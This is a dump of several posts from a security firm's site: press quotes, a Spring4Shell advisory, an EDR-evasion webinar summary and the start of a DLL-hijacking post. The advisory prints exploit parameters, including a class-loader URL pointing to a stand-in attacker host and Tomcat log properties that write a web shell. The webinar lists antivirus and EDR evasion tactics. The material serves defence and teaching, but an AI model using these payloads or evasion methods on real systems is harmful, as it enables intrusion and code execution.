“Privacy is often overlooked when thinking about model training,” comments Nick Landers, director of research at NetSPI, “but data cannot be completely anonymized without destroying its value to machine learning (ML). In other words, models already contain broad swaths of private data that might be extracted as part of an attack.” As the use of AI grows, so will the threats against it increase in 2023.

Read the full article at SecurityWeek!

[post_title] => SecurityWeek: Cyber Insights 2023 | Artificial Intelligence [post_excerpt] => NetSPI Director of Research Nick Landers was featured in the SecurityWeek article called Cyber Insights 2023 | Artificial Intelligence. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => securityweek-cyber-insights-2023-artificial-intelligence [to_ping] => [pinged] => [post_modified] => 2023-02-16 17:27:12 [post_modified_gmt] => 2023-02-16 23:27:12 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29374 [menu_order] => 140 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [5] => WP_Post Object ( [ID] => 29117 [post_author] => 17 [post_date] => 2022-12-29 09:00:00 [post_date_gmt] => 2022-12-29 15:00:00 [post_content] =>

On December 29, NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. Read the preview below or view it online.

+++

Scott Sutherland, VP of Research, NetSPI

Can DTL Help Stop Software Supply Chain Attacks?

Adoption of distributed ledger technology (DTL) is still in its infancy and we’ll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several “supply chain compromises” that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem.

Nick Landers, VP of Research, NetSPI

By the end of next year every major financial institution will have announced adoption of Blockchain technology.

There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.

You can read the full article at Enterprise Security Tech!

[post_title] => Enterprise Security Tech: 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain [post_excerpt] => NetSPI's Scott Sutherland and Nick Landers were featured in the Enterprise Security Tech article called 2023 Cybersecurity Predictions: Major Financial Institutions Will Turn To Blockchain. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => enterprise-security-tech-2023-cybersecurity-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:09:57 [post_modified_gmt] => 2023-01-23 21:09:57 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=29117 [menu_order] => 157 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [6] => WP_Post Object ( [ID] => 28916 [post_author] => 17 [post_date] => 2022-11-29 15:15:00 [post_date_gmt] => 2022-11-29 21:15:00 [post_content] =>

On November 29, both Vice President of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. Read the preview below or view it online.

+++

What will the New Year bring in cyberspace? Here's a roundup of some of the top security industry forecasts, trends and cybersecurity predictions for 2023. Where do things go from here?

Read on as 18 industry leaders in the security space come together to provide their insights into how the cybersecurity industry will shake out in 2023.

NetSPI: Scott Sutherland, VP of Research - Can DTL Help Stop Software Supply Chain Attacks? 

"Adoption of distributed ledger technology (DTL) is still in its infancy and we'll see some interesting use cases gain momentum in 2023. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DTL can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). Over the last few years, there have been several "supply chain compromises'' that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. DLT could be a solution to that problem."

+++

NetSPI: Nick Landers, VP of Research - By the end of next year every major financial institution will have announced adoption of Blockchain technology

"There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains. 

By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven't already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was "secure by default", think again. Just like cloud platform adoption, the promises of "secure by default" will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech."

You can read the full article at VMblog!

[post_title] => VMBlog: 18 Security Leaders Come Together to Share Their 2023 Predictions [post_excerpt] => On November 29, VPs of Research, Scott Sutherland and Nick Landers, were featured in the VMblog article called 18 Security Leaders Come Together to Share Their 2023 Predictions. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => vmblog-security-leaders-share-2023-predictions [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:01 [post_modified_gmt] => 2023-01-23 21:10:01 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28916 [menu_order] => 167 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [7] => WP_Post Object ( [ID] => 28197 [post_author] => 77 [post_date] => 2022-08-09 13:16:00 [post_date_gmt] => 2022-08-09 18:16:00 [post_content] =>

On August 9, NetSPI Head of Adversarial R&D Nick Landers was featured in the Dark Reading article called Abusing Kerberos for Local Privilege Escalation. Read the preview below or view it online.

+++

As the main authentication protocol for Windows enterprise networks, Kerberos has long been a favored hacking playground for security researchers and cybercriminals alike. While the focus has been on attacking Kerberos authentication to carry out remote exploits and aid in lateral movement across the network, new research explores how Kerberos can also be abused to great effect in carrying out a variety of local privilege escalation (LPE) attacks.

At the Black Hat USA conference this week in Las Vegas, James Forshaw, security researcher for Google Project Zero, and Nick Landers, head of adversarial R&D for NetSPI, plan to take the security discussion beyond the Kerberoasting and Golden/Silver ticket attack discussions that have dominated Kerberos security research in recent years. In the session "Elevating Kerberos to the Next Level," Forshaw and Landers will explore authentication bypasses, sandbox escapes, and arbitrary code execution in privileged processes.

"James and I have both spent a lot of our time digging into Windows internals, and Kerberos is fundamental to network authentication between Windows systems. However, most of the existing research and tooling I've done focuses on remote exploitation — ignoring attack surfaces that exist on just a local machine," says Landers, who explained why the pair decided to dig deeper into design flaws in the way Kerberos does local authentication. "Through this, we've discovered many interesting flaws — some fixed and some not — that we're excited to share on Wednesday, along with the tooling we’ve built and knowledge we've gained over the last several months."

The tooling will help others in the security research community to inspect and manipulate Kerberos on local systems to build on the pair's research. The duo will also offer up some important detection and configuration advice to help security practitioners mitigate the risk of the flaws that they'll present.

You can read the full article on Dark Reading!

[post_title] => Dark Reading: Abusing Kerberos for Local Privilege Escalation [post_excerpt] => On August 9, NetSPI Head of Adversarial R&D Nick Landers was featured in the Dark Reading article called Abusing Kerberos for Local Privilege Escalation. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => dark-reading-abusing-kerberos-for-local-privilege-escalation [to_ping] => [pinged] => [post_modified] => 2023-01-23 15:10:22 [post_modified_gmt] => 2023-01-23 21:10:22 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=28197 [menu_order] => 219 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [8] => WP_Post Object ( [ID] => 27620 [post_author] => 77 [post_date] => 2022-04-06 15:00:00 [post_date_gmt] => 2022-04-06 20:00:00 [post_content] =>

On March 29, 2022, organizations experienced widespread concern when the Spring4Shell vulnerability was disclosed. Since then, we’ve noticed a sense of confusion around the remote code execution (RCE) vulnerability and its impact.  

Before we dive into the vulnerability details, here are four facts to help you understand what Spring4Shell really is – and its intricacies: 

  • The vulnerability was leaked ahead of CVE publication and ahead of the emergency releases planned by the Spring Framework team. This small window gave time for individuals to speculate on total impact and spread unfounded claims.
  • The name “Spring4Shell” was sometimes used for both this issue (CVE-2022-22965) and another Spring vulnerability (CVE-2022-22963) related to Cloud Function Expressions. However, these vulnerabilities are unrelated and should be handled independently.
  • Spring4Shell is actually a bypass for a fixed issue from 12 years ago, CVE-2010-1622, which involves the same abuse of nested properties to access class loader objects. The issue itself stems from insecure coding patterns that Spring recommends avoiding. In addition, it depends on specific deployment and environmental requirements. All of this makes it difficult to identify affected applications. We’ll cover detection in detail later in this blog.
  • Impact is still to be determined, as there are conflicting claims about Spring4Shell being actively exploited. Initial reports compare it to Log4Shell, which has been leveraged in many known attacks since disclosure. But after analysis of the initial report, it is still unclear how many applications are truly vulnerable to attacks.  

In summary, this vulnerability was prematurely leaked shortly after the publication of another unrelated Spring issue. The name “Spring4Shell” was quickly abused in reference to the recent “Log4Shell” issue, despite the vulnerabilities having significantly different impact. Misinformation about the vulnerability quickly circulated while the Spring team was still preparing its patches and technical guidance. 

As we monitor the situation closely, we will update this blog with new details. Continue reading to learn what we know so far and how we’ve optimized NetSPI’s Attack Surface Management platform to help organizations identify vulnerable instances of Spring Framework. 

Current Status: On March 31, 2022, a patch was released by the Spring team for CVE-2022-22965

What is Spring4Shell? 

Spring4Shell is a vulnerability found in the Java Spring Core framework that could allow for remote code execution (RCE) on web servers around the world. As noted above, this issue is almost identical to an older vulnerability from 2010 and if exploited, could allow attackers to write files to the underlying web server host, modify system configurations, or upload web shells for code execution.  

The popularity of VMWare-owned Spring and the prematurely released proof of concept (PoC) generated lofty expectations of abuse. However, nuances in the technical details have revealed exploitation is slightly more than trivial and dependent on specific coding practices and deployment environments. 

Follow along with us as we break down the technical details of the issue, who exactly is affected, and how to handle the next round of vulnerability panic. 

Technical Overview 

Underneath, the vulnerability depends on the unsecured use of basic Java objects (POJOs) as parameters in request mappings. The Spring MVC supports this concept to simplify the mapping of HTML form bodies to objects. Here is an example of this feature in use: 

// Plain Java object (POJO) that Spring MVC will auto-bind from form parameters.
// (Accessor declarations are shorthand for the article — bodies omitted.)
public class User { 
    public String name; 
 
 
    public String getName(); 
    public void setName(String name); 
} 
 
 
// NOTE: deliberately vulnerable example — the handler binds request parameters
// straight onto the POJO without configuring allowedFields on the DataBinder,
// so clients can walk nested "hidden" properties (e.g. class.module.classLoader).
@RequestMapping("/adduser") 
public User addUser(User user) { 
    return user; 
} 

This code is convenient, but technically goes against guidance from Spring by not configuring allowedFields on the DataBinder. It’s the novelty of this specific pattern that casts uncertainty on how many applications might be affected. We can leverage this endpoint to create a new User object with the following request. 

POST /adduser HTTP/1.1 
 
name=Nick 

Upon receiving the request, Spring (specifically the Beans subsystem) will inspect the User class and try to assign properties to a new object based on the parameters provided. If a more complicated object was supplied, Spring would also allow us to supply nested properties such as this: 

POST /adduser HTTP/1.1 
 
address.city.name=NewYork 

Which, through reflection, would equate to the following Java calls: 

UserObj.getAddress().getCity().setName("NewYork"); 

It’s here that we arrive at the primary concern. In the examples above, we’re assigning expected properties on our User object, but there are many other “hidden” properties that could be abused to access core internal classes in the Java framework. This was originally disclosed in CVE-2010-1622, where the payload accessed the URLs on a nested Class Loader object: 

class.classLoader.URLs[0]=jar:https://attacker/evil.jar!/ 
 
UserObj.getClass().getClassLoader().getURLs()[0] = 
"jar:https://attacker/evil.jar!/"; 

While the original fix blocked access to the classLoader property, this issue resurfaced in JDK 9 where you could now access the module property on a class, and leverage the classLoader from that instead: 

class.module.classLoader... 
  
UserObj.getClass().getModule().getClassLoader()…;

In addition to restoring classLoader access, the leaked Spring4Shell proof of concept (PoC) took a different approach to achieving code execution. Rather than manipulating class loader URLs (which have since been more secured), the author used property walking to access the Tomcat logging class and reconfigure its properties to achieve an arbitrary file write. In the example below shell.jsp could be written to any filesystem path with the supplied contents from the pattern property. 

class.module.classLoader.resources.context.parent.pipeline.first.
prefix=shell 
class.module.classLoader.resources.context.parent.pipeline.first.
suffix=.jsp 
class.module.classLoader.resources.context.parent.pipeline.first.
pattern=[Content] 
class.module.classLoader.resources.context.parent.pipeline.first.
directory=[Path] 

The new fix for this vulnerability more thoroughly inspects properties to block access to the classLoader and protectionDomain regardless of where they fall in the object graph. However, even Spring notes that this doesn’t prevent the abuse of unrestricted parameter bindings in more specific cases. Developers should understand the implications of this feature and follow the hardening guidance from Spring whenever possible. 

Am I Affected by Spring4Shell? 

Exploitation of the vulnerability depends on specific coding patterns and deployment environments, both of which make the issue difficult to identify with simple scanners. Any individual web endpoint (authenticated or not) in an application could be affected. As a first step, we encourage you to connect directly with your development teams to assess application dependency trees.  

According to the Spring team’s report, those who meet the following criteria are affected by the Spring4Shell vulnerability.  

  • Java Development Kit (JDK) 9 or higher 
  • Apache Tomcat as the Servlet container 
  • Packaged as a traditional WAR (in contrast to a Spring Boot executable jar) 
  • Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older versions 
  • spring-webmvc or spring-webflux dependency 

Spring4Shell Detection 

For better or worse this vulnerability is difficult to detect remotely from a blind context. As mentioned, any endpoint in an application might be affected and requirements like authentication might result in many false negatives. Here is a breakdown of our recommended detection strategies to follow: 

  • Contact internal development teams to identify custom applications that leverage the Spring framework. Vulnerable versions are noted above and there are multiple options for patching and mitigations. There are also local scanners available to help search for affected JAR files on the system.
  • Monitor vendor sites for the references to CVE-2022-22965/Spring4Shell to identify and patch 3rd party applications.
  • External web requests can be used as a primitive detection for this vulnerability. When certain invalid data is provided for property resolution, the server might often return a different status code (400/500). Scanners can perform multiple requests against web endpoints to identify variable status codes based on input. This is a good indication that access to nested classLoader objects is allowed.  

Additionally, NetSPI has optimized our Attack Surface Management (ASM) platform to detect Spring4Shell at scale and in unique scenarios. Our team of expert pentesters, researchers, developers, among others, research, triage, and discover new vulnerabilities daily. As they are disclosed, new vulnerabilities are added to our ASM platform for continuous monitoring. For our current external network penetration testing customers, we have updated our processes to include Spring4Shell testing for in-scope projects. 

As ubiquitous vulnerabilities like Log4Shell and Spring4Shell become more prevalent, understanding your attack surface has never been more important. Those that proactively and continuously monitor and inventory their attack surface will be in better shape to find and address vulnerable instances of Spring Framework in a fast and comprehensive manner. 

Spring4Shell Remediation 

The Spring Framework team has since released fixes to the vulnerability. Make sure you update to Spring Framework 5.3.18 and 5.2.20 or greater. 

Where that isn’t possible, the following code can be added to secure parameter bindings, although Spring themselves notes this might not be comprehensive in every circumstance.  

// Spring-published mitigation: a global @ControllerAdvice that registers a
// field denylist on every WebDataBinder, blocking "class"/"Class" property
// paths (e.g. class.module.classLoader) from request parameter binding.
// NOTE(review): per the surrounding text, Spring cautions this may not be
// comprehensive in every circumstance -- upgrading the framework is the fix.
@ControllerAdvice 
@Order(Ordered.LOWEST_PRECEDENCE) 
public class BinderControllerAdvice { 
 
    // Runs before data binding on each request. Despite its name, this
    // method configures *disallowed* fields rather than an allowlist.
    @InitBinder 
    public void setAllowedFields(WebDataBinder dataBinder) { 
         String[] denylist = new String[]{"class.*", "Class.*", 
         "*.class.*", "*.Class.*"}; 
         dataBinder.setDisallowedFields(denylist); 
    } 
 
} 

If you are running older Spring Framework versions or can’t make the update, Spring published these workarounds for you.  

Additionally, Apache Tomcat, one of the preconditions, released new versions to close the attack vector on Tomcat’s side. In their post, they point to the importance of having multiple mitigation options that “provide flexibility and layered protection.” 

When seemingly critical vulnerabilities like Spring4Shell are brought to light, it’s important to identify reliable resources and peers that can help you understand the vulnerability nuances.  

We hope this blog helped you better understand the vulnerability, its impact, and your options for detection and remediation. NetSPI is available to walk through our detection process and help you navigate the complexities this vulnerability presents. Please contact us to learn more. 

Do you use vulnerable versions of the Spring Framework?

[post_title] => Navigating the Complexities of Spring4Shell [CVE-2022-22965] [post_excerpt] => Explore the intricacies of Spring4Shell discovery and remediation and learn how the vulnerability [CVE-2022-22965] may impact you. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => spring4shell [to_ping] => [pinged] => [post_modified] => 2023-06-12 13:45:20 [post_modified_gmt] => 2023-06-12 18:45:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=27620 [menu_order] => 274 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [9] => WP_Post Object ( [ID] => 25902 [post_author] => 77 [post_date] => 2021-07-12 15:56:00 [post_date_gmt] => 2021-07-12 20:56:00 [post_content] =>

On July 12, 2021, NetSPI Director of Research Nick Landers was featured in an article from SC Magazine:

Endpoint detection and response systems can often serve as a frontline defense for many organizations, collecting and storing telemetry from dispersed employee devices and using it to detect malicious activities or behaviors. However, a recent experiment by academic researchers at the University of Piraeus in Greece indicates they are far from a silver bullet when it comes to protecting your organization....

Nick Landers, director of research at penetration testing company NetSPI, told SC Media that it’s rare for one team or company to even have access to such a wide range of EDR systems and any research that can test and compare different products in the EDR market is valuable in and of itself. 

He said the results outlined in the study largely mirror his experience with customers, and that many advanced threat actors generally rely on two strategies for evading detection by EDR systems: using completely unique or novel tactics that can frustrate heuristic analysis or data algorithms, and “not making noise in general” by understanding what telemetry EDR systems collect and measure.

“I think the ones we see that are the most effective are ones where the attacker understands the data [the EDR system is] collecting and keeps generation of that data low,” he said. 

However, Landers said his main takeaway from the study is not necessarily that EDR products are shoddy or not worth the cost (though he again lamented the lack of access that independent third parties typically have to test such systems), but rather a “more constructive” reinforcement of the need for multiple layers of security to ensure any one tool or process doesn’t become a single point of failure.

“I think looking at the minutiae and finger-pointing and trying to identify specific products and their specific failings is a fault that belongs to everyone in the industry,” he said. “But [EDR systems] are valuable tools and while I might not agree with their strategy or their marketing or cost or licensing model or availability, I think they do contribute to a defense in depth strategy and that’s ultimately what we should all be striving for.”

To learn more, read the full article here: https://www.scmagazine.com/news/network-security/edr-alone-wont-protect-your-organization-from-advanced-hacking-groups

[post_title] => SC Magazine: EDR (alone) won’t protect your organization from advanced hacking groups [post_excerpt] => On July 12, 2021, NetSPI Director of Research Nick Landers was featured in an article from SC Magazine. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => edr-alone-wont-protect-your-organization-from-advanced-hacking-groups [to_ping] => [pinged] => [post_modified] => 2022-12-16 10:51:58 [post_modified_gmt] => 2022-12-16 16:51:58 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=25902 [menu_order] => 374 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [10] => WP_Post Object ( [ID] => 25473 [post_author] => 53 [post_date] => 2021-05-26 19:16:27 [post_date_gmt] => 2021-05-26 19:16:27 [post_content] =>
Watch Now

Overview 

Endpoint detection and response (EDR) tools are quickly becoming the standard protection against today’s adversaries. Yet, much like the solutions before them – legacy antivirus – attackers are already researching, publishing, and deploying novel techniques to understand and evade modern EDR products.

To stay one step ahead of the stealthiest cyber adversaries, red teams and penetration testers must study and simulate real defensive evasion techniques to identify weaknesses in their organization’s defense in depth, and security leaders must gain a better understanding of the EDR technologies they invest in. 

During this webinar led by NetSPI VP of Research Nick Landers, viewers will:

  • Explore the role that modern EDRs play and tips for evaluating vendors  
  • Review the latest defensive evasion techniques sophisticated adversaries deploy to bypass EDR tools  
  • Discover helpful resources for staying up to date with modern research and techniques  
  • Learn how to effectively implement the defensive evasion techniques within your own red team operations

Key highlights: 

The transition from classic antivirus to EDR and other solutions  

For about 30 years, it’s been widely known that antivirus software isn’t perfect and presents tricky challenges. The table below outlines antivirus strategies and associated evasions.

Antivirus Strategies | Antivirus Evasions
Checksums — Compare the SHA/MD5 hash to verify system integrity, match a known malicious sample, or mark an affected software version. | Make small binary changes to manipulate hashes. Re-use system binaries for functionality. Side-load modules for persistence.
Signatures — Compare byte level contents of file data, file system structures, MBR, etc. to match known malicious patterns. | Chunk samples and identify affected portions in sequence. Obfuscate/pack executable code. Scan signature files for matches.
Sandboxing — Detonate payloads in controlled environments to track heuristic behaviors and flag known patterns. | Detect sandbox environments before execution. Deliver stages from servers with intelligence. Force user interaction.
Data mining — Use a known data set of malicious and benign samples to train generic algorithms and/or build signatures. | Monitor popular data sources (VirusTotal). Perform in-memory manipulation/execution to evade statically-sourced detections.
Real time — Monitor open file handles, system events, application installs, etc., to identify dangerous behavior. | Avoid using disk components where possible. Prefer OS internals for persistence as opposed to full software packages.

Despite common evasion techniques, antivirus has made some progress, such as:

  • Traditional antivirus  
  • The need for signatures/rules never goes away 
  • Years of public research offered a convenience set of “problems” to fix 
  • Many well-known antivirus vendors now sell EDR as an additional product  

The technical case for EDR products  

When it comes to the technical case, at a high level, it’s important to think about how EDR solutions differ from antivirus and what EDR products have to do. There are three main components that they have to design, all of which have nuances and caveats, as well as flaws that an attacker can try to abuse or disrupt.  

The three main components include:

  • Data generation
    • Process creation 
    • Network traffic 
    • File write/read events 
    • Sandboxing 
    • Library load events 
    • Kernel callbacks
  • Data collection 
    • Event forwarding 
    • Agent stability 
    • Data integrity 
    • Network uptime 
    • Privilege separation 
    • Performance impact
  • Data response 
    • Dashboards 
    • Risk scoring 
    • Processing delay 
    • Baselining 
    • Remote isolation 
    • Network scaling  

General EDR evasion strategies  

It’s important to have a holistic view of common EDR evasion strategies — and four common strategies often come to mind.

Typical evasion strategies include:

  • Use obscurity to avoid known/common event patterns 
    • Just like defense, obscurity alone is a weak strategy 
  • Challenge assumptions about OS internals and subsystems 
    • The advantage always lies in understanding the battlefield  
  • Disable event sources to break data collection 
    • ETW, AMSI, user mode hooks, etc.  
  • Avoid transitions to reduce detection surface, as you are most vulnerable in transition  

Hopeful solutions  

When discussing possible solutions, machine learning (ML) and artificial intelligence (AI) need to be part of the conversation. The two terms are often used interchangeably and AI is more commonly used than ML, but this topic in particular focuses more on machine learning.  

Machine learning captures the attention of investors and common terms or statements associated with the concept include, “analyzes millions of data points and adapts,” “high degree of confidence," and “next generation.” However, in addition to being a trend or marketing buzzword, it’s important to understand what machine learning really is.

Overview of machine learning:

  • Set of techniques that aim to model a problem mathematically 
  • Essentially a combination of statistics, math, and computers 
  • Predictions without explicit programming 
  • Impressive results for the right problems 
  • Growing utility for every field 
    • Computing power is more available 
    • Data aggregation is common in systems 

Data presents several challenges or issues related to creating stronger defenses against threats.  

Issues associated with data include:

  • Better defenses demand we have more data 
    • More data to identify edge cases 
    • More data to reduce false positives 
    • More data to contextualize complex attacks 
  • New telemetry doesn’t replace existing data 
    • File hashes and content still need to be reviewed 
    • Network traffic still needs to be analyzed 
    • Spam and phishing emails still need to be identified  
  • Data in some places is approaching zettabytes in scale 
  • Given the points above, machine learning is almost the only solution; it can’t be done any other way 

Machine learning is often seen as the next solution to solve attacks. While it is a buzzword that gets thrown around in marketing materials to sell products, in security, machine learning is primarily used for classification. Methods are also tried and true, as opposed to advanced methods, and include decision trees and gradient boosting.

Here’s an example of a machine learning strategy for EDR:

  1. Collect a data set for analysis 
    • Example: EMBER/SOREL dataset for PE files 
    • One file type from one platform doesn’t represent “malware” 
  2. Select feature set for learning
    • Consider the context of that data (packed PE vs loaded code) 
    • Exports/Entropy/Runtime API calls/String/Raw data
  3. Make the model actionable 
    • Does data in the real world match the features in the model? 
    • Can you test against models fast enough in real time? 
    • Domain knowledge is required (know any data science/malware authors?) 

While machine learning has many benefits, it isn’t without risks.

Machine learning risks include, but aren’t limited to:

  • Data privacy is a real concern for training data 
    • Anonymization techniques can’t be perfect 
    • Extracting information from models 
  • Models, once trained, are difficult to adjust manually 
  • Once understood, offensive attacks are trivial 
    • “It’s not even a question, there are no defenses, there are no detections, there’s barely any lagging.” - @moo_hax 
    • Model stealing requires very limited information (just a score) 
    • Machine learning systems engineers aren’t thinking about security yet 
  • Bypassing an algorithm will always be easier than a human  

Where does this leave us?  

Here are some final considerations to keep in mind about EDR tools:

  • Almost everything “new” is just a fresh decal on existing engines made by the same people at the same companies 
  • Products continue to demand more data, charging customers for the privilege to share, and rolling that data into future products 
  • Machine learning/AI is mainly a new buzzword like app whitelisting, command line logging, zero trust, etc.  
  • Alert fatigue and poor scoring is a huge issue, even more than lack of telemetry 
  • Attackers are achieving a very deep understanding of OS internals and the same should be asked of EDR vendors both in communications and implementations 
  • Nothing will ever be a silver bullet, effective security will always be about defense in depth 
  • Consider the multitude of free solutions available and opportunities to layer projects and mitigations  

With these considerations in mind, here a few questions to ask vendors when evaluating EDR tools:

  • What data would you collect from our network and how would the data be used? 
  • Does your product make use of the kernel driver component? 
  • Are you a member of the Microsoft Virus Initiative? (MVI)  
  • What do you use to measure solution effectiveness? 
  • What metrics do you use for testing changes in QA? 
  • Do you perform any public third party testing to verify the integrity of your solutions? Can we see any report? 

Improve your security controls with NetSPI  

While EDR tools offer businesses some security benefits, these tools also have flaws and threat actors have identified several evasion strategies. As a result, only 20 percent of common attack behaviors are caught by EDR, SIEM, and MSSP out-of-the-box solutions. 

While 100 percent detection doesn’t exist, EDR tools alone are not enough. NetSPI’s Breach and Attack Simulation (BAS) can improve your security controls by delivering a centralized detective control platform that enables you to create and execute customized procedures utilizing purpose-built technology.

Professional human pentesters simulate real-world attacker behaviors, not just indicators of compromise (IOCs), putting your detective controls to the test in a way no other BAS solution can. Learn more about NetSPI’s BAS offerings or connect with an expert team member by scheduling a demo today.

[wonderplugin_video iframe="https://youtu.be/6OF6lA0kCuY" lightbox=0 lightboxsize=1 lightboxwidth=1200 lightboxheight=674.999999999999916 autoopen=0 autoopendelay=0 autoclose=0 lightboxtitle="" lightboxgroup="" lightboxshownavigation=0 showimage="" lightboxoptions="" videowidth=1200 videoheight=674.999999999999916 keepaspectratio=1 autoplay=0 loop=0 videocss="position:relative;display:block;background-color:#000;overflow:hidden;max-width:100%;margin:0 auto;" playbutton="https://www.netspi.com/wp-content/plugins/wonderplugin-video-embed/engine/playvideo-64-64-0.png"]

[post_title] => Understanding Modern EDR Tools: How They Work, How They Provide Value, and How to Bypass Them [post_excerpt] => [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => understanding-modern-edr-tools [to_ping] => [pinged] => [post_modified] => 2023-08-22 10:04:20 [post_modified_gmt] => 2023-08-22 15:04:20 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?post_type=webinars&p=25473 [menu_order] => 53 [post_type] => webinars [post_mime_type] => [comment_count] => 0 [filter] => raw ) [11] => WP_Post Object ( [ID] => 23530 [post_author] => 77 [post_date] => 2020-02-19 07:00:45 [post_date_gmt] => 2020-02-19 13:00:45 [post_content] =>

DLL hijacking has been a centerpiece of our operations for many years. During that time we’ve explored the deep caveats which make this technique difficult to actually use in the real world. Our implementations have expanded to include export table cloning, dynamic IAT patching, stack walking, and run time table reconstruction. We explore the details of these techniques extensively in our Dark Side Ops courses and we’d like to share some of that knowledge here.

If you’ve ever “understood” DLL hijacking, only to return to your lab and fail to get it working properly, this post is for you.

TLDR? Check out Koppeling. You really should read it though 

Refresher

This post won’t cover the basics of DLL hijacking. We expect you are familiar with module search order, KnownDLLs, “safe search”, etc. If you need a refresher, here are some links:

In addition, some tooling designed to discover/exploit hijacks:

When you first learned about DLL hijacking, you were likely shown a fairly primitive example which is trivial to exploit. Something like this:

// Example hijack target: loads "functions.dll" by bare name, so the module
// search order (application directory, PATH, etc.) decides which file wins.
// Planting an attacker-controlled copy earlier in the search order triggers
// evil!DllMain when this call executes.
void BeUnsafe() {
	HMODULE module = LoadLibrary("functions.dll");
	// ...
}

Here, we simply need to get some evil code into the correct location as “functions.dll”. LoadLibrary will ultimately trigger the execution of our DllMain function, where we might write something like this:

// Minimal hijack payload: pop calc on process attach, then report success.
// Kept deliberately tiny so nothing risky executes while loader lock is held.
BOOL WINAPI DllMain(HINSTANCE instance, DWORD reason, LPVOID reserved)
{
	// Act only on the initial process-attach notification; ignore
	// thread attach/detach and process detach.
	if (reason == DLL_PROCESS_ATTACH)
	{
		// Do evil stuff
		system ("start calc.exe");
	}

	return TRUE;
}

There are a few critical reasons exploitation is so trivial here. We’ll go through them here and then look at each one in more detail throughout the post.

  1. We don’t maintain the stability of the source process. In most instances, it will exit, crash, or otherwise misbehave as a result of our hijack. After all, it’s likely loading this DLL for a reason.
  2. We don’t maintain code execution in the source process. As an extension of 1, we are simply executing calc externally. We don’t care if the process stays up, or even what happens after we “pop our shell”.
  3. We don’t care about loader lock. Because our entry point is so simple, we don’t have to worry about executing complex code inside DllMain while the loader lock is held (which can be dangerous).
  4. We don’t have to worry about export names. Because this hijack occurs as a result of LoadLibrary, our malicious DLL doesn’t need to include any specific export names or ordinals.

If you’ve ever attempted to hijack in the real world, and something broke/failed, it was likely because of one (or many) of the 4 points above. Our time spent hijacking has yielded many tools and snippets which we’ll share throughout the post, so let’s get smarter.

Execution Sinks

There are two primary “sinks” from which DLL execution can originate. The names aren’t important, but we need consistent terminology to stay on the same page. Both of these sinks are provided by the module loader (LDR) within ntdll.dll. If an actor is interested in gaining execution as part of a DLL load, they require a call to ntdll!LdrpCallInitRoutine, triggering execution of evil!DllMain.

